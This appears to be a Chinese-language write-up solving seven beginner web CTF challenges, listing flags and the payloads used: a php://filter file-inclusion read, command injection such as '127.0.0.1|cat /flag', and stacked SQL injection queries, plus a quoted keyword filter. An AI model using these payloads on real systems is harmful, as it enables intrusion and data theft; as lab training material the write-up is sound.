一.[HCTF 2018]WarmUp
查看源码,发现有一个source.php文件
查看此文件,出现一堆PHP代码
发现里面有一个hint.php文件,查看一下
文件里说明flag在ffffllllaaaagggg里
得到flag
flag{5e4b3989-5ece-406b-8c40-458c3939bd7c}
二.[极客大挑战 2019]EasySQL
直接万能密码
flag{866282ef-8b72-408c-8f99-7bfbeb7de6f6}
三.[极客大挑战 2019]Havefun
查看源代码
有一个cat变量,通过get方式传参,如果cat=dog输出flag
使用构造payload:/?cat=dog
flag{d486eb52-eb03-4550-8f80-4ac5fc2817b6}
四.[ACTF2020 新生赛]Include
点击链接
出现了flag.php文件,?file=flag.php 猜测文件包含漏洞
php://filter协议,用base64编码的方式来读文件flag.php;这时页面会显示出源文件flag.php经过base64编码后的内容,然后经过base64解码就可以看到flag;
payload: /?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码后的内容为:
解码
flag{55fc10f5-9f6f-40ba-8cb5-1e0146b36084}
五.[ACTF2020 新生赛]Exec
需要了解的知识点
ls(英文全拼:list files):用于显示指定工作目录下的内容(列出目前工作目录所含之文件及子目录)cat(英文全拼:concatenate):用于连接文件并打印到标准输出设备上。
查看此文件的目录:127.0.0.1|ls
只有一个index.php
查看上级目录127.0.0.1|ls /
查看flag:127.0.0.1|cat /flag
flag{a978ed20-b4c2-446c-9755-8beb871cb5c8}
六[强网杯 2019]随便注
查询3时报错,说明有两个字段
然后想尝试联合查询
结果报错return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现过滤了select|update|delete|drop|insert|where|\./i
爆数据库:1';show databases;#
爆表名:1'; show tables;#
出来两个表1'; show columns from words;#
1'; show columns from '1919810931114514';#
注意:表名为数字时,要用反引号包起来查询。
七. [SUCTF 2019]EasySQL
先判断一下是数字型还是字符型,输入1
试一下堆叠注入
爆出数据库:1;show databases;#
爆表:1;show tables;#
然后爆字段:1;show columns from FLAG;#
,输入后回显Nonono.
,猜测有被过滤
直接构造payload为:*,1
flag{3afd6880-acfb-41a5-9291-a532c250d013}